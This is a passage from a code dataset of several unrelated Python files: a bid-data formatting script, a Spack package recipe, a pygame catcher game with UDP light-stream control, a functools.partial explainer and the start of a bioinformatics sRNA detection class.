------------------------------------------------------\n result_df = prepare_new_records_for_concatenation(init_df, current_run_data_df)\n\n # SET INDEX\n try:\n result_df['BidDate_Formatted'] = result_df['Bid Date'].apply(parse_bid_date)\n result_df['BidDate_Formatted'] = pd.to_datetime(result_df['BidDate_Formatted'])\n result_df = result_df.sort_values('BidDate_Formatted')\n except:\n logger.info(\"Unable to sort by Bid Date\")\n\n # SET INDEX\n result_df.reset_index(drop=True, inplace=True)\n result_df.index += 1\n # result_df.index.name = 'SN'\n result_df['SN'] = result_df.index\n\n # ------------------------------------------------------\n # SET COLUMN ORDER\n # ------------------------------------------------------\n add_quotes_to_data = lambda x: \"'{}\".format(str(x).strip('\"').strip(\"'\"))\n for col in ['Bid Date', 'Updated Date', 'Inserted Date', 'BidDate_Formatted']:\n result_df[col] = result_df[col].apply(add_quotes_to_data)\n\n result_df = result_df[preserve_columns_order]\n result_df.fillna(\"\", inplace=True)\n\n # Reformat Price attribute\n # ------------------------------------------------------\n result_df['Price Formatted'] = result_df['Price'].apply(extract_dolar_value)\n\n # ------------------------------------------------------\n # UPDATE RENT ATTRIBUTES\n # ------------------------------------------------------\n # // update rents.json with empty dict for missing addresses\n rent_attrs = init_rent_dict_for_missing_address(result_df['Address'])\n\n # // update result_df with rent attributes based on addresses\n zillow_additional_attrs = ['Estimate Range', 'Estimate', 'Avg. Sales Price', 'Bedrooms',\n 'rentzestimate_amount', 'rentzestimate_last_updated',\n 'zestimate_valuation_range']\n result_df[zillow_additional_attrs] = result_df.apply(\n lambda row_series: rent_attrs_series(rent_attrs, row_series, zillow_additional_attrs),\n axis=1)\n\n # ------------------------------------------------------\n # UPDATE FORMULAS\n # ------------------------------------------------------\n for column_name, column_formula in formulas_dict.items():\n result_df[column_name] = apply_excel_formula(result_df, column_formula)\n\n # ------------------------------------------------------\n # ZILLOW Attributes\n # ------------------------------------------------------\n zillow_additional_attrs = ['bathrooms', 'zillow_bedrooms', 'home_size', 'home_type',\n 'property_size', 'tax_value', 'year_built', 'zestimate_amount',\n 'zestimate_valuationRange_low', 'zestimate_valuation_range_high']\n result_df[zillow_additional_attrs] = result_df.apply(\n lambda row_series: rent_attrs_series(rent_attrs, row_series, zillow_additional_attrs),\n axis=1)\n\n # ------------------------------------------------------\n # WRITE RESULT TO SPREADSHEET\n # ------------------------------------------------------\n logger.info(\n \"New result with {} records will be uploaded to SpreadSheet into Sheet:{}\".format(len(result_df), sheet_name))\n df2google.upload(result_df, sheet_name)\n logger.info(\"Upload Successful\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scrape_format.py","file_name":"scrape_format.py","file_ext":"py","file_size_in_byte":21143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"347790261","text":"# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nfrom spack.package import *\n\n\nclass Pbsuite(Package, SourceforgePackage):\n \"\"\"PBJelly is a highly automated pipeline that aligns long sequencing\n reads (such as PacBio RS reads or long 454 reads in fasta format)\n to high-confidence draft assembles.\"\"\"\n\n homepage = \"https://sourceforge.net/p/pb-jelly/wiki/Home/\"\n sourceforge_mirror_path = \"pb-jelly/PBSuite_15.8.24.tgz\"\n\n version(\"15.8.24\", sha256=\"1be082faa62cb3f701c78498db8544c844c3d6d3e3524fecf00a12e82a97e12b\")\n\n depends_on(\"blasr@1.3.1:\", type=\"run\")\n depends_on(\"python@2.7:\", type=\"run\")\n depends_on(\"py-networkx@1.1:\", type=\"run\")\n\n def install(self, spec, prefix):\n install_tree(\"pbsuite\", prefix.pbsuite)\n install_tree(\"bin\", prefix.bin)\n\n def setup_run_environment(self, env):\n env.prepend_path(\"PYTHONPATH\", self.prefix)\n","sub_path":"var/spack/repos/builtin/packages/pbsuite/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"519107896","text":"import ogre.renderer.OGRE as ogre\r\nfrom aspect import Aspect\r\nfrom collections import deque\r\nimport time\r\nimport math\r\n\r\nclass Net(Aspect):\r\n def __init__(self, ent):\r\n Aspect.__init__(self,ent)\r\n \r\n def crosslink(self):\r\n self.netMgr = self.engine.netMgr\r\n \r\n def tick(self, dtime):\r\n if len(self.ent.updateQueue) >0: # handle served position, orientation\r\n self.statusData = self.ent.updateQueue.popleft() #get the latest throw out the rest\r\n self.ent.updateQueue.clear()\r\n \r\n self.ent.pos = self.statusData.pos \r\n self.ent.dir = self.statusData.dir \r\n self.ent.speed = self.statusData.speed\r\n self.ent.pitch = self.statusData.pitch \r\n self.ent.roll = self.statusData.roll\r\n self.ent.isReady = self.statusData.isReady\r\n\r\n\r\n","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"9437822","text":"#! /usr/bin/env python3\n# coding:utf-8\n\n\"\"\"\n1 python 里所说的偏函数,和数学意义上的偏函数不同\n\n2 以 int() 函数为例,在设置默认参数 base 之后,可以根据 base=2,8,10,16 转换不同的进制\n 比如,int('12345',base=8)\n >>>5349\n int('12345',base=16)\n >>>74565\n 假如需要转换大量的二进制字符串,可以定义一个转换函数:\n def int2(x,base=2):\n return int(x,base)\n\n 使用 partial 函数,就不需要自己定义 int2(),直接可以创建一个:\n from functools import partial\n int2 = partial(int,base=2)\n int2('1000000')\n >>>64\n int2('1010101')\n >>>85\n\n3 partial 的作用就是,把一个函数的某些参数给固定住(也就是设置默认值),返回一个新的函数\n格式: new_func = partial(func, default=xx)\n\n\"\"\"\n#python partial函数的源码:\ndef partial(func, *args, **keywords):\n \"\"\"New function with partial application of the given arguments\n and keywords.\n \"\"\"\n if hasattr(func, 'func'):\n args = func.args + args\n tmpkw = func.keywords.copy()\n tmpkw.update(keywords)\n keywords = tmpkw\n del tmpkw\n func = func.func\n\n def newfunc(*fargs, **fkeywords):\n newkeywords = keywords.copy()\n newkeywords.update(fkeywords)\n return func(*(args + fargs), **newkeywords)\n newfunc.func = func\n newfunc.args = args\n newfunc.keywords = keywords\n return newfunc\n","sub_path":"partial function/偏函数定义 partial function.py","file_name":"偏函数定义 partial function.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"311555752","text":"import sys\nimport pygame\nfrom .utils import percent_round_int\n\nfrom ple.games import base\nfrom ple.games.utils.udp_comm_sender_new import CommSender\nfrom ple.games.utils.lv_reader import LabviewReader\n# from PyQt5.QtCore import (pyqtSignal, pyqtSlot, QObject, QSettings, QThread)\nimport random\nimport time\nimport numpy as np\n\nclass Paddle(pygame.sprite.Sprite):\n\n def __init__(self, speed, width, height, action_x_map_list,\n SCREEN_WIDTH, SCREEN_HEIGHT):\n self.speed = speed\n self.width = width\n\n self.SCREEN_WIDTH = SCREEN_WIDTH\n self.SCREEN_HEIGHT = SCREEN_HEIGHT\n self.xCoor_list = action_x_map_list\n self.vel = 0.0\n\n pygame.sprite.Sprite.__init__(self)\n\n image = pygame.Surface((width, height))\n image.fill((0, 0, 0, 0))\n image.set_colorkey((0, 0, 0))\n\n pygame.draw.rect(\n image,\n (255, 255, 255),\n (0, 0, width, height),\n 0\n )\n\n self.image = image\n self.rect = self.image.get_rect()\n self.rect.center = (\n SCREEN_WIDTH / 2 - width / 2,\n SCREEN_HEIGHT - height - 3)\n\n # def update(self, dx, dt):\n def update(self, target_x):\n # !!!-- add your classification method here!--!!!\n # if target_x > xx and target_x < yy:\n # res = x_all[0]\n # ...\n _, y = self.rect.center\n n_x = self.xCoor_list[target_x - 1] - self.width / 2\n # if n_x <= 0:\n # n_x = 0\n #\n # if n_x + self.width >= self.SCREEN_WIDTH:\n # n_x = self.SCREEN_WIDTH - self.width\n self.rect.center = (n_x, y)\n\n def draw(self, screen):\n # screen.blit(self.image, self.rect.center)\n pos = (self.rect.center[0] - self.width / 2, self.rect.center[1])\n screen.blit(self.image, pos)\n\n def set_paddle_x(self,pad_x):\n y = 777\n self.rect.center = (pad_x,y)\n pass\n\nclass Fruit(pygame.sprite.Sprite):\n def __init__(self, speed, width, height,\n gap,\n SCREEN_WIDTH, SCREEN_HEIGHT, rng,\n center_x,center_y):\n self.speed = speed\n self.width = width\n self.height = height\n self.init_x = 430\n self.SCREEN_WIDTH = SCREEN_WIDTH\n self.SCREEN_HEIGHT = SCREEN_HEIGHT\n self.rng = rng\n\n pygame.sprite.Sprite.__init__(self)\n\n image = pygame.Surface((width, height + gap))\n image.fill((0, 0, 0, 0))\n image.set_colorkey((0, 0, 0))\n\n pygame.draw.rect(\n image,\n (255, 120, 120),\n (0, 0, width, height),\n 0\n )\n self.image = image\n self.rect = image.get_rect()\n self.rect.center = (center_x, center_y)\n\n def update(self, dt):\n x, y = self.rect.center\n n_y = int(y + self.speed * dt)\n\n self.rect.center = (x, n_y)\n\n\n def reset_auto(self, gap):\n x = self.rng.choice(\n range(\n self.width,\n self.SCREEN_WIDTH - self.width,\n 1\n )\n )\n\n y = self.height - gap\n # self.rng.choice(\n # range(\n # self.height,\n # # int(self.SCREEN_HEIGHT / 3),\n # 10,\n # self.height)\n # )\n self.rect.center = (x, -1 * y)\n\n def reset_manually(self, init_x, gap):\n x = init_x\n y = self.height - gap\n self.rect.center = (x, -1 * y)\n\n def set_fruit_fall_speed(self,fru_fall_speed):\n self.speed = fru_fall_speed\n # print(self.speed)\n\n def draw(self, screen):\n pos = (self.rect.center[0] - self.width / 2, self.rect.center[1])\n screen.blit(self.image, pos)\n # self.rect.center\n\nclass Catcher_Discrete(base.PyGameWrapper):\n \"\"\"\n Based on `Eder Santana`_'s game idea.\n\n .. _`Eder Santana`: https://github.com/EderSantana\n\n Parameters\n ----------\n width : int\n Screen width.\n\n height : int\n Screen height, recommended to be same dimension as width.\n\n init_lives : int (default: 3)\n The number lives the agent has.\n\n \"\"\"\n\n def __init__(self, width=860, height=860, init_lives=10000,\n action_num=8, udp_comm=True,fall_speed=0.0015,\n fruit0_init_x=10, fruit1_init_x=10,\n paddle_init_x=10, fruit_fall_speed=0.05):\n\n self.fruit0_init_x = fruit0_init_x\n self.fruit1_init_x = fruit1_init_x\n self.paddle_init_x = paddle_init_x\n self.fruit_fall_speed = fruit_fall_speed\n\n self.action_num = action_num\n actions = self._init__action_dict()\n base.PyGameWrapper.__init__(self, width, height, actions=actions)\n\n self.fruit_width = percent_round_int(width, 1)\n self.screen_width = width\n self.fruit_height = percent_round_int(height, 0.04)\n # self.fruit_gap = 0.2 * height\n # self.fruit_fall_speed = fall_speed * height\n self.fruit_fall_speed = fruit_fall_speed\n\n self.player_speed = 0.010 * width\n self.paddle_width = 20\n self.paddle_height = 20\n\n\n self._dx = 0.0\n self.last_action = None\n self.cur_action = None\n self.init_lives = init_lives\n self.action_x_map_list = self._action_map_x()\n # self.angle_speed = 90\n\n # # new Thread for fruits' position update\n # self.fruits_thread = QThread()\n # new pygame events\n self.CUR_ACTION = pygame.USEREVENT + 1\n self.LAST_ACTION = pygame.USEREVENT + 2\n\n self._udp_comm = udp_comm\n self.to_update_text = 0\n self.is_manual_reset = True\n self.is_random = False\n self.is_sequence = False\n self.seq_msg = \"0\"\n self.fruit_rand_next_pos = None\n self.fruit_offset = 80\n self.seq_i = 0\n self.is_simple_AI = False\n self.is_Q_learning_AI = False\n self.simple_AI_left_speed = 40\n self.simple_AI_right_speed = 40\n self.ai_light_command = \"\"\n self.random_num = 0\n self.counter_shape = 0\n\n self.isToLeft = False\n self.isToRight= False\n self.acce_a = 3\n self.acce_sec = 3\n\n self.is_RL_to_send = False\n self.is_RL_train = False\n self.is_RL_test = False\n self.left_shift_speed = 30\n self.right_shift_speed = 30\n self.is_simple_AI = False\n #draw the grid lines:\n # self.draw_grid()\n if self._udp_comm:\n # the addr is localhost and port is 5888\n self._sender = CommSender(\"localhost\", 5888)\n self._reader = LabviewReader()\n\n\n def _handle_player_events(self):\n self._dx = 0.0\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n if event.type == self.CUR_ACTION:\n self.cur_action = event.idx\n\n if event.type == self.LAST_ACTION:\n self.last_action = event.idx\n\n def _action_map_x(self):\n action_num = self.action_num\n action_xCoor = []\n # x_unit = self.width / (action_num * 2-1)\n x_unit = self.width / (action_num-1)\n # for i in range(0, action_num * 2-1, 2):\n action_xCoor.append(self.paddle_width/2)\n # print (self.paddle_width, self.width)\n for i in range(1, action_num):\n to_append = int(x_unit * i)\n if i == action_num - 1:\n to_append -= self.paddle_width / 2\n action_xCoor.append(to_append)\n # print (action_xCoor)\n return action_xCoor\n\n def _init__action_dict(self):\n actions = {}\n for i in range(self.action_num):\n tmp = {str(i + 1): i + 1}\n actions.update(tmp)\n return actions\n\n def init(self):\n self.score = 0\n self.lives = self.init_lives\n self.player = Paddle(self.player_speed, self.paddle_width,\n self.paddle_height, self.action_x_map_list,\n self.width, self.height)\n\n self.fruit0 = Fruit(self.fruit_fall_speed,\n self.fruit_width, self.fruit_height,\n 0,\n self.width, self.height, self.rng,-1,-1)\n\n self.fruit1 = Fruit(self.fruit_fall_speed,\n self.fruit_width, self.fruit_height,\n 0,\n self.width, self.height, self.rng,-1,-1)\n #\n # self.fruit2 = Fruit(self.fruit_fall_speed,\n # self.fruit_width, self.fruit_height,\n # 0,\n # self.width, self.height, self.rng)\n\n # self.gap = int(self.height/1.5)\n if self.is_manual_reset == True:\n self.fruit0.reset_manually(self.fruit0_init_x,0)\n self.fruit1.reset_manually(self.fruit1_init_x,0)\n else:\n self.fruit0.reset_auto(0)\n self.fruit1.reset_auto(0)\n # self.fruit1.reset_manually(self.fruit_init_x,self.gap)\n # self.fruit2.reset_manually(self.fruit_init_x,(self.gap)*2)\n\n #draw grid lines:\n # self.draw_grid()\n\n def getGameState(self):\n \"\"\"\n Gets a non-visual state representation of the game.\n\n Returns\n -------\n\n dict\n * player x position.\n * players velocity.\n * fruits x position.\n * fruits y position.\n\n See code for structure.\n\n \"\"\"\n state = {\n \"player_x\": self.player.rect.center[0],\n \"player_y\": self.player.rect.center[1],\n \"player_vel\": self.player.vel,\n \"fruit0_x\": self.fruit0.rect.center[0],\n \"fruit0_y\": self.fruit0.rect.center[1],\n \"to_update_text\": self.to_update_text,\n # \"fruit_rand_pos\": self.random_num\n \"fruit1_x\": self.fruit1.rect.center[0],\n \"fruit1_y\": self.fruit1.rect.center[1]\n # \"fruit2_x\": self.fruit2.rect.center[0],\n # \"fruit2_y\": self.fruit2.rect.center[1],\n }\n\n return state\n\n def getScore(self):\n return self.score\n\n def game_over(self):\n return self.lives == 0\n\n def step(self, dt):\n self.screen.fill((0, 0, 0))\n self._handle_player_events()\n\n self.score += self.rewards[\"tick\"]\n\n if self.fruit0.rect.center[1] >= self.height or self.fruit1.rect.center[1] >= self.height:\n self.score += self.rewards[\"positive\"]\n self.seq_i += 1\n self.random_num = random.randint(1, 3)\n #print(\"score: \", self.score)\n if self.is_manual_reset == True:\n self.fruit0.reset_manually(self.fruit0_init_x, 0)\n self.fruit1.reset_manually(self.fruit1_init_x, 0)\n else:\n self.fruit0.reset_auto(0)\n self.fruit1.reset_auto(0)\n\n #self.to_update_text = 1\n\n if pygame.sprite.collide_rect(self.player, self.fruit0) or pygame.sprite.collide_rect(self.player, self.fruit1):\n # print(ret)\n self.score += self.rewards[\"negative\"]\n self.lives -= 1\n self.seq_i += 1\n self.random_num = random.randint(1, 3)\n\n if self.is_manual_reset == True:\n self.fruit0.reset_manually(self.fruit0_init_x, 0)\n self.fruit1.reset_manually(self.fruit1_init_x, 0)\n else:\n self.fruit0.reset_auto(0)\n self.fruit1.reset_auto(0)\n\n\n self.to_update_text = 1\n\n if any([self.cur_action == idx for idx in list(self.actions.values())]):\n self.player.update(self.cur_action)\n\n self.fruit0.update(dt)\n self.fruit1.update(dt)\n # self.fruit2.update(dt)\n\n if self.lives == 0:\n self.score += self.rewards[\"loss\"]\n\n self.player.draw(self.screen)\n self.fruit0.draw(self.screen)\n self.fruit1.draw(self.screen)\n self.draw_grid()\n\n if self.is_random == True:\n if self.random_num == 1: #left\n self.fruit0_init_x = -3 / 8 * self.screen_width\n self.fruit1_init_x = 7 / 8 * self.screen_width\n # self.fruit0.width = percent_round_int(self.screen_width, 0.5)\n # self.fruit0.fruit_width = percent_round_int(self.screen_width, 0.5)\n # self.reset_fruit_param(self.fruit_width)\n elif self.random_num == 2: #middle\n self.fruit0_init_x = -1 / 8 * self.screen_width\n self.fruit1_init_x = 9 / 8 * self.screen_width\n # self.fruit0.width = percent_round_int(self.screen_width, 0.25)\n # self.reset_fruit_param(self.fruit0.fruit_width)\n\n elif self.random_num == 3: #right\n self.fruit0_init_x = 1 / 8 * self.screen_width\n self.fruit1_init_x = 11 / 8 * self.screen_width\n # self.fruit0.width = percent_round_int(self.screen_width, 0.5)\n # self.reset_fruit_param(self.fruit0.fruit_width)\n\n if self.is_sequence == True:\n seq = self.seq_msg\n length = len(seq)\n if seq[self.seq_i] == \"0\" and self.seq_i < length:\n self.fruit_init_x = 215 + self.fruit_offset\n if seq[self.seq_i] == \"1\" and self.seq_i < length:\n self.fruit_init_x = 430\n if seq[self.seq_i] == \"2\" and self.seq_i < length:\n self.fruit_init_x = 645 - self.fruit_offset\n if self.seq_i == length-1:\n self.seq_i = 0\n\n if self.is_simple_AI == True:\n fruit_x = self.fruit0.rect.center[0]\n fruit_y = self.fruit0.rect.center[1]\n if fruit_x > 480 and fruit_y > 170 and fruit_y < 180:\n self.ai_light_command = \"left\"\n self._action_single_screen(self.simple_AI_left_speed, \"left\")\n elif fruit_x <= 480 and fruit_y > 170 and fruit_y < 180:\n self.ai_light_command = \"right\"\n self._action_single_screen(self.simple_AI_right_speed, \"right\")\n\n if self.is_Q_learning_AI == True:\n num_heights = 4\n num_fruit_x = 3\n num_pad_x = 7\n\n pad_x_bounds = []\n for i in range(num_pad_x):\n pad_x_bounds.append(self.width / num_pad_x * (i))\n fruit_height_bounds = []\n for j in range(num_heights):\n fruit_height_bounds.append(self.height / num_pad_x * (j))\n\n num_states = num_heights * num_fruit_x * num_pad_x\n num_actions = 8 # light streams\n self.R = np.zeros([num_states, num_actions])\n self.Q = np.zeros([num_states, num_actions])\n GAMMA = 0.8\n\n self.init_R_table(self.R)\n\n if self.fruit_init_x < 480:\n self.game._action_single_screen(40, \"left\")\n else:\n self.game._action_single_screen(40, \"right\")\n\n if self.getGameState()[\"fruit0_y\"] == 0:\n # if self.fruit_init_x < 430:\n # token = self.fruit_init_x\n # self.reset_fruit_param(percent_round_int(self.screen_width, 0.5))\n # self.fruit_init_x = token\n # elif self.fruit_init_x == 430:\n # token = self.fruit_init_x\n # self.reset_fruit_param(percent_round_int(self.screen_width, 0.25))\n # self.fruit_init_x = token\n # elif self.fruit_init_x > 430:\n # token = self.fruit_init_x\n # self.reset_fruit_param(percent_round_int(self.screen_width, 0.5))\n # self.fruit_init_x = token\n pass\n\n # time.sleep(0.001) #for slowing down the fps\n\n # self.fruit1.draw(self.screen)\n # self.fruit2.draw(self.screen)\n\n # def _action_lightStream_map(self, action,action_list,angle_speed_list):\n def _action_lightStream_map(self, angle_speed,group_num):\n # angle_speed = 0\n self._sender.send(\"params\", 1, \"hDirection\", \"left\")\n self._sender.send(\"params\", 2, \"hDirection\", \"right\")\n self._sender.send(\"start_right\")\n self._sender.send(\"start_left\")\n #acquire: speed, group_num\n # for i in range(0,8):\n # if angle_speed = angle_speed_list[i]:\n # if angle_speed < 0:\n # group_num = 1 #left group\n # angle_speed = abs(angle_speed)\n if group_num == 1:\n self._sender.send(\"restore_left\")\n self._sender.send(\"params\", group_num, \"hSpeed\", angle_speed)\n self._sender.send(\"off_right\")\n # else:\n # group_num = 2 #right group\n # angle_speed = abs(angle_speed)\n if group_num == 2:\n self._sender.send(\"restore_right\")\n self._sender.send(\"params\", group_num, \"hSpeed\", angle_speed)\n self._sender.send(\"off_left\")\n # angle_speed = abs(angle_speed)\n\n def _action_single_screen(self,angle_speed,direction):\n # if self.is_RL_to_send:\n if direction == \"left\" or direction ==\"right\":\n self._sender.send(\"params\", 1, \"hDirection\", direction)\n # self._sender.send(\"params\", 2, \"hDirection\", direction)\n self._sender.send(\"params\", 1, \"hSpeed\", angle_speed)\n # self._sender.send(\"params\", 2, \"hSpeed\", angle_speed)\n # self._sender.send(\"start_right\")\n # self._sender.send(\"restore_right\")\n self._sender.send(\"start_left\")\n # self._sender.send(\"restore_left\")\n elif direction == \"reset_all\":\n # self._sender.send(\"reset_right\")\n self._sender.send(\"reset_left\")\n elif direction == \"stop_all\":\n # self._sender.send(\"stop_right\")\n self._sender.send(\"stop_left\")\n\n def _setAction(self, action, last_action):\n \"\"\"\n Pushes the action to the pygame event queue.\n \"\"\"\n if action is None:\n action = self.NOOP\n\n if last_action is None:\n last_action = self.NOOP\n\n curr_ac_num = pygame.event.Event(self.CUR_ACTION, idx= action)\n last_ac_num = pygame.event.Event(self.LAST_ACTION, idx=last_action)\n\n pygame.event.post(curr_ac_num)\n pygame.event.post(last_ac_num)\n\n def get_states(self,string):\n game_states = {\n \"player_x\": self.player.rect.center[0],\n \"player_y\": self.player.rect.center[1],\n \"player_vel\": self.player.vel,\n \"fruit0_x\": self.fruit0.rect.center[0],\n \"fruit0_y\": self.fruit0.rect.center[1],\n \"to_update_text\": self.to_update_text,\n }\n return game_states[string]\n\n def init_R_table(self,side_name):\n self.reward = np.zeros([860, 18]) # rows(states): x-coord (1~860), cols(actions): light stream speed (5~90)\n self.Q_table = np.zeros([860, 18])\n self.Gamma = 0.8\n # self.\n\n # For left side, the left-mid point is considered the reward point\n # For the right side, the right-mid point is considered the reward point\n if side_name == \"left\":\n for i in range (200,230): # 215 is the center, +15, -15 is the acceptable reward range\n self.reward[i,:] = 10\n if side_name == \"right\":\n for j in range (630,660):\n self.reward[j,:] = 10 # 615 is the center.\n\n def update_Q_table(self,Q,R,state,action,next_state):\n Q[state, action] = R(state, action) + self.Gamma * max(Q[next_state, :])\n return Q\n\n # def train_model(self):\n # pass\n\n def draw_grid(self):\n #draw grid lines:\n line_color = 255, 200, 255\n line_width = 2\n line_gap = self.width / 8\n #horizontal Line:\n pygame.draw.line(self.screen, line_color, (0,int(self.height*2/8)),\n (self.width,int(self.height*2/8)), line_width)\n\n for i in range(1,9):\n if i != 4:\n pygame.draw.line(self.screen, line_color, (line_gap*i, 0), (line_gap*i, self.height), line_width)\n\n","sub_path":"ple/games/catcher_discrete2.py","file_name":"catcher_discrete2.py","file_ext":"py","file_size_in_byte":20374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"306421738","text":"import os\nimport sys\nimport shutil\nfrom subprocess import call\nfrom annogesiclib.multiparser import Multiparser\nfrom annogesiclib.helper import Helper\nfrom annogesiclib.sRNA_intergenic import intergenic_srna\nfrom annogesiclib.sRNA_utr_derived import utr_derived_srna\nfrom annogesiclib.merge_sRNA import merge_srna_table, merge_srna_gff\nfrom annogesiclib.extract_sRNA_info import extract_energy, extract_blast\nfrom annogesiclib.plot_mountain import plot_mountain_plot\nfrom annogesiclib.sRNA_class import classify_srna\nfrom annogesiclib.gen_srna_output import gen_srna_table, gen_best_srna\nfrom annogesiclib.blast_class import blast_class\nfrom annogesiclib.compare_sRNA_sORF import srna_sorf_comparison\nfrom annogesiclib.change_db_format import change_format\nfrom annogesiclib.compare_srna_term import compare_srna_term\nfrom annogesiclib.compare_srna_promoter import compare_srna_promoter\nfrom annogesiclib.print_rank_all import print_rank_all\nfrom annogesiclib.sRNA_filter_frag import filter_frag\nfrom annogesiclib.sRNA_filter_min_utr import filter_utr\nfrom annogesiclib.sRNA_antisense import srna_antisense\nfrom annogesiclib.args_container import ArgsContainer\n\n\nclass sRNADetection(object):\n\n def __init__(self, args_srna):\n self.args_container = ArgsContainer()\n self.helper = Helper()\n self.multiparser = Multiparser()\n self.gff_output = os.path.join(args_srna.out_folder, \"gffs\")\n self.table_output = os.path.join(args_srna.out_folder, \"tables\")\n self.stat_path = os.path.join(args_srna.out_folder, \"statistics\")\n self.tss_path = self._check_folder_exist(args_srna.tss_folder)\n self.pro_path = self._check_folder_exist(args_srna.pro_folder)\n self.sorf_path = self._check_folder_exist(args_srna.sorf_file)\n self.fasta_path = os.path.join(args_srna.fastas, \"tmp\")\n self.tran_path = os.path.join(args_srna.trans, \"tmp\")\n self.term_path = self._check_folder_exist(args_srna.terms)\n self.merge_wigs = os.path.join(args_srna.out_folder, \"merge_wigs\")\n self.prefixs = {\"merge\": os.path.join(\n args_srna.out_folder, \"tmp_merge\"),\n \"utr\": os.path.join(\n args_srna.out_folder, \"tmp_utrsrna\"),\n \"normal\": os.path.join(\n args_srna.out_folder, \"tmp_normal\"),\n \"in_cds\": os.path.join(\n args_srna.out_folder, \"tmp_incds\"),\n \"merge_table\": os.path.join(\n args_srna.out_folder, \"tmp_merge_table\"),\n \"utr_table\": os.path.join(\n args_srna.out_folder, \"tmp_utrsrna_table\"),\n \"normal_table\": os.path.join(\n args_srna.out_folder, \"tmp_normal_table\"),\n \"in_cds_table\": os.path.join(\n args_srna.out_folder, \"tmp_incds_table\"),\n \"basic\": os.path.join(\n args_srna.out_folder, \"tmp_basic\"),\n \"energy\": os.path.join(\n args_srna.out_folder, \"tmp_energy\")}\n self.tmps = {\"nr\": os.path.join(args_srna.out_folder, \"tmp_nr\"),\n \"srna\": os.path.join(args_srna.out_folder, \"tmp_sRNA\")}\n self.best_table = os.path.join(self.table_output, \"best\")\n self.table_output = os.path.join(args_srna.out_folder, \"tables\")\n self.stat_path = os.path.join(args_srna.out_folder, \"statistics\")\n self.all_best = {\"all_gff\": os.path.join(\n self.gff_output, \"all_candidates\"),\n \"best_gff\": os.path.join(self.gff_output, \"best\"),\n \"all_table\": os.path.join(\n self.table_output, \"all_candidates\"),\n \"best_table\": os.path.join(self.table_output, \"best\")}\n\n def _check_folder_exist(self, folder):\n if folder is not None:\n path = os.path.join(folder, \"tmp\")\n else:\n path = None\n return path\n\n def _check_gff(self, gffs):\n for gff in os.listdir(gffs):\n if gff.endswith(\".gff\"):\n self.helper.check_uni_attributes(os.path.join(gffs, gff))\n\n def _run_format(self, blast_path, database, type_, db_file, err):\n call([os.path.join(blast_path, \"makeblastdb\"), \"-in\", database,\n \"-dbtype\", type_, \"-out\", db_file], stderr=err)\n\n def _formatdb(self, database, type_, out_folder,\n blast_path, database_type):\n err = open(os.path.join(out_folder, \"log.txt\"), \"w\")\n if (database.endswith(\".fa\")) or (\n database.endswith(\".fna\")) or (\n database.endswith(\".fasta\")):\n pass\n else:\n folders = database.split(\"/\")\n filename = folders[-1]\n folder = \"/\".join(folders[:-1])\n for fasta in os.listdir(folder):\n if (fasta.endswith(\".fa\")) or (\n fasta.endswith(\".fna\")) or (\n fasta.endswith(\".fasta\")):\n if \".\".join(fasta.split(\".\")[:-1]) == filename:\n database = os.path.join(folder, fasta)\n if database_type == \"sRNA\":\n change_format(database, \"tmp_srna_database\")\n os.remove(database)\n shutil.move(\"tmp_srna_database\", database)\n db_file = \".\".join(database.split(\".\")[:-1])\n self._run_format(blast_path, database, type_, db_file, err)\n err.close()\n\n def _merge_frag_tex_file(self, files, args_srna):\n if (args_srna.frag_wigs is not None) and (\n args_srna.tex_wigs is not None):\n self.helper.merge_file(files[\"frag_gff\"], files[\"tex_gff\"])\n self.helper.merge_file(files[\"frag_csv\"], files[\"tex_csv\"])\n shutil.move(files[\"tex_csv\"], files[\"merge_csv\"])\n self.helper.sort_gff(files[\"tex_gff\"], files[\"merge_gff\"])\n os.remove(files[\"frag_csv\"])\n os.remove(files[\"frag_gff\"])\n os.remove(files[\"tex_gff\"])\n elif (args_srna.frag_wigs is not None):\n shutil.move(files[\"frag_csv\"], files[\"merge_csv\"])\n self.helper.sort_gff(files[\"frag_gff\"], files[\"merge_gff\"])\n os.remove(files[\"frag_gff\"])\n elif (args_srna.tex_wigs is not None):\n shutil.move(files[\"tex_csv\"], files[\"merge_csv\"])\n self.helper.sort_gff(files[\"tex_gff\"], files[\"merge_gff\"])\n\n def _run_normal(self, prefix, gff, tran, fuzzy_tss, args_srna):\n if \"tmp_cutoff_inter\" in os.listdir(args_srna.out_folder):\n os.remove(os.path.join(args_srna.out_folder, \"tmp_cutoff_inter\"))\n files = {\"frag_gff\": None, \"frag_csv\": None,\n \"tex_gff\": None, \"tex_csv\": None,\n \"merge_gff\": None, \"merge_csv\": None}\n if (\"tss\" in args_srna.import_info):\n tss = self.helper.get_correct_file(self.tss_path, \"_TSS.gff\",\n prefix, None, None)\n else:\n tss = None\n if self.pro_path is not None:\n pro = self.helper.get_correct_file(\n self.pro_path, \"_processing.gff\", prefix, None, None)\n else:\n pro = None\n if args_srna.frag_wigs is not None:\n files[\"frag_gff\"] = os.path.join(\n args_srna.out_folder, \"_\".join([\"tmp_frag\", prefix]))\n files[\"frag_csv\"] = os.path.join(\n args_srna.out_folder, \"_\".join([\"tmp_frag_table\", prefix]))\n\n args_srna = self.args_container.container_intersrna(\n \"frag\", files, args_srna, prefix,\n os.path.join(args_srna.gffs, gff), tran, tss,\n pro, fuzzy_tss)\n intergenic_srna(args_srna)\n if args_srna.tex_wigs is not None:\n files[\"tex_gff\"] = os.path.join(\n args_srna.out_folder, \"_\".join([\"tmp_tex\", prefix]))\n files[\"tex_csv\"] = os.path.join(\n args_srna.out_folder, \"_\".join([\"tmp_tex_table\", prefix]))\n args_srna = self.args_container.container_intersrna(\n \"tex\", files, 